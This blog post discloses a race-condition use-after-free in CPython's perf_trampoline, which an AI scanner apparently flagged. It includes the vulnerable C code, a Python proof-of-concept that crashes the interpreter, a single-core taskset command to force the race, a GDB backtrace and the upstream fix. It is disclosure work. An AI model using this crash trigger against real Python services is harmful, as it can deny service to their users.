Summary
In this post, I detail my discovery of a critical race condition and Use-After-Free (UAF) vulnerability in CPython’s perf_trampoline implementation that causes immediate Segmentation Faults in Python 3.12 and SystemErrors in 3.13+. Through stress testing and GDB analysis, I determined that the crash occurs when sys.deactivate_stack_trampoline() is called concurrently with active bytecode execution. The root cause is the free_code_arenas function, which aggressively munmaps executable memory pages without validating if worker threads are currently executing code or unwinding stack frames within those regions. This oversight allows the runtime to “pull the rug” out from under running threads, causing the CPU to fault when the Instruction Pointer attempts to access memory that I found had been freed milliseconds earlier.
The Discovery: AI-Assisted Bug Hunting
This investigation began when my custom AI source code scanner flagged a suspicious memory management pattern in Python/perf_trampoline.c. The tool identified a hazard where munmap was being called on executable memory regions without sufficient locking mechanisms or reference counting to protect concurrent threads.
The scanner specifically highlighted the free_code_arenas function, noting that it iterates through a global list of memory arenas and frees them instantly. In a multi-threaded environment like Python’s, “instant” deallocation of code that might still be running is a recipe for disaster. Guided by this automated insight, I developed a Proof-of-Concept (PoC) to verify if the runtime was indeed “pulling the rug” out from under active threads.
Vulnerability Details
The vulnerability exists in how CPython handles the teardown of “trampolines”—small snippets of assembly code generated on the fly to help profilers (like Linux perf) map Python code to C stack frames.
The Vulnerable Code
The root cause is in free_code_arenas. When you call sys.deactivate_stack_trampoline(), the interpreter cleans up the memory arenas used for these trampolines.
// Python/perf_trampoline.c
static void
free_code_arenas(void)
{
code_arena_t *cur = perf_code_arena;
code_arena_t *prev;
perf_code_arena = NULL; // 1. Global pointer is cleared
while (cur) {
// [CRITICAL VULNERABILITY]
// The memory is unmapped immediately via a syscall.
// There is NO check to see if a thread is currently executing
// code on this page or unwinding through it.
munmap(cur->start_addr, cur->size);
prev = cur->prev;
PyMem_RawFree(cur);
cur = prev;
}
}
The Execution Path
While that cleanup is running, worker threads are routing execution through py_trampoline_evaluator. This function jumps into the generated assembly code located inside those very arenas.
// Python/perf_trampoline.c
static PyObject *
py_trampoline_evaluator(PyThreadState *ts, _PyInterpreterFrame *frame, int throw)
{
// ...
// 'f' is a pointer to the machine code inside the mmap'd arena.
// The CPU Instruction Pointer (IP) moves into the danger zone here.
return f(ts, frame, throw, _PyEval_EvalFrameDefault);
}
The Race Condition
The crash occurs due to a specific interleaving of events:
- Worker Thread enters a trampoline frame. Its Instruction Pointer (PC) is now inside the memory region
0x725ab.... - Main Thread calls
munmapon that region. The OS kernel removes the page table entry. - Worker Thread attempts to return or handle an exception. The system unwinder (
libgcc) tries to read the stack frame to find the Return Address. - CRASH: The CPU raises a Page Fault because the memory address
0x725ab...is no longer valid.
Proof of Concept (PoC)
To confirm the AI’s findings, I wrote a Python script that spawns worker threads performing heavy CPU loops. This keeps the worker threads constantly inside the trampoline execution path while the main thread aggressively toggles the trampoline on and off.
Critical Note: Forcing the Race Race conditions can be notoriously difficult to reproduce reliably because they depend on exact nanosecond timing. I found that this specific crash is most consistent when the Python process is pinned to a single CPU core.
Running on a single core forces the OS to rapidly context switch between the “destroyer” thread (doing the munmap) and the “worker” threads (executing the code) on the same physical hardware. This forced interleaving drastically increases the probability that the OS will switch context away from a worker exactly when it is standing on the memory page that is about to be pulled.
Reproduction Command: To maximize the crash probability, run the script using taskset on Linux:
taskset -c 0 python3 poc.py
The Python Script (poc.py):
import sys
import threading
import os
def heavy_workload():
# Keep the thread inside the trampoline evaluator
while True:
_ = sum(i * i for i in range(500))
def trigger_race():
print(f"[+] PID: {os.getpid()}")
# Spawn threads to occupy the evaluator
for _ in range(8):
t = threading.Thread(target=heavy_workload, daemon=True)
t.start()
while True:
# The race trigger: Toggle rapidly
sys.activate_stack_trampoline("perf")
sys.deactivate_stack_trampoline()
if __name__ == "__main__":
trigger_race()
Forensic Analysis (GDB)
Running the PoC resulted in a hard crash. The GDB backtrace provides undeniable proof of the Use-After-Free.
The Killer (Thread 9): This thread is executing the cleanup. It calls munmap, destroying the memory page.
Thread 9 (Thread 0x725ad0b00b80 (LWP 12791)):
#0 0x0000725ad0125d7b in __GI_munmap () at ../sysdeps/unix/syscall-template.S:117
#1 0x0000725ad071b9f4 in free_code_arenas () at Python/perf_trampoline.c:315
#2 _PyPerfTrampoline_FreeArenas () at Python/perf_trampoline.c:421
The Victim (Thread 1): This thread is exiting and trying to unwind the stack. The error message <error: Cannot access memory> confirms the memory it relies on is gone.
Thread 1 (Thread 0x725ace5fd6c0 (LWP 12846) (Exiting)):
#0 x86_64_fallback_frame_state ... at ./md-unwind-support.h:63
pc = 0x725ab661e00a <error: Cannot access memory at address 0x725ab661e00a>
#1 uw_frame_state_for ...
#2 0x0000725ab6c86c8a in _Unwind_ForcedUnwind_Phase2 ...
The address 0x725ab661e00a (the Program Counter) points to where the trampoline used to be. Because Thread 9 unmapped it moments earlier, Thread 1 crashes with a SEGFAULT.
Conclusion
This bug highlights the extreme care required when managing executable memory in multi-threaded runtimes. A single unchecked munmap can destabilize the entire interpreter. I reported this issue to the CPython team (Issue #143228), and a fix involving reference counting for the code arenas is currently in progress for Python 3.13 and 3.14.
Potential Impact
While this race condition requires specific timing to trigger, the consequences are severe for any production system using the perf profiler support.
- Python 3.12 (Immediate Crash): In Python 3.12.x, this vulnerability results in an immediate Segmentation Fault (SIGSEGV). If a production application (e.g., a web server or data processing pipeline) toggles profiling on and off, an attacker or a scheduled task could inadvertently trigger a Denial of Service (DoS) by crashing the interpreter process entirely.
- Python 3.13 / 3.14 (System Integrity Error): In newer development branches, the runtime detects the memory violation differently, resulting in a
SystemError: error return without exception set. While this might occasionally avoid a hard segfault, it indicates internal state corruption. The interpreter is left in an unstable state, likely leading to termination or unpredictable behavior. - Memory Safety Violation: Fundamentally, this is a Use-After-Free (UAF) vulnerability. While my PoC demonstrates a crash (DoS), UAF bugs are a class of memory safety violations that, under highly specific conditions where the freed memory is reallocated immediately with attacker-controlled data, can sometimes lead to arbitrary code execution.
Patch and Remediation
The root of the issue was the assumption that sys.deactivate_stack_trampoline() could safely unmap memory immediately. The fix, as identified by the CPython core developers following my report, involves introducing Reference Counting to the code arenas.
Instead of unconditionally unmapping the memory when the trampoline is deactivated, the runtime must ensure that no code objects are currently relying on that memory.
The Fix Strategy: Code Object Watchers The remediation utilizes CPython’s PyCode_AddWatcher API. This allows the memory manager to track the lifecycle of every code object that uses a trampoline.
- Reference Counting: Each memory arena (page of trampolines) now maintains a reference count.
- Delayed Deallocation: When
sys.deactivate_stack_trampoline()is called, the arenas are notmunmap‘d immediately. Instead, they are marked for deletion. - Watcher Callbacks: A code watcher monitors the destruction of Python code objects. Only when the last code object using a specific arena is destroyed (decrementing the arena’s refcount to zero) is the
munmapsyscall executed.
This ensures that as long as a thread could be executing a trampoline (holding a reference to the code object), the physical memory page remains valid.
Status:
- Python 3.12: Marked as “Won’t Fix” for now, as 3.12 is in security-fix-only mode and the complexity of the backport is high compared to the risk (requires
sys.activate_stack_trampolineusage). - Python 3.13 & 3.14: A patch implementing the reference counting mechanism has been merged (PR #143233).

Welcome to My Blog
Stay updated with expert insights, advice, and stories. Discover valuable content to keep you informed, inspired, and engaged with the latest trends and ideas.




Leave a Reply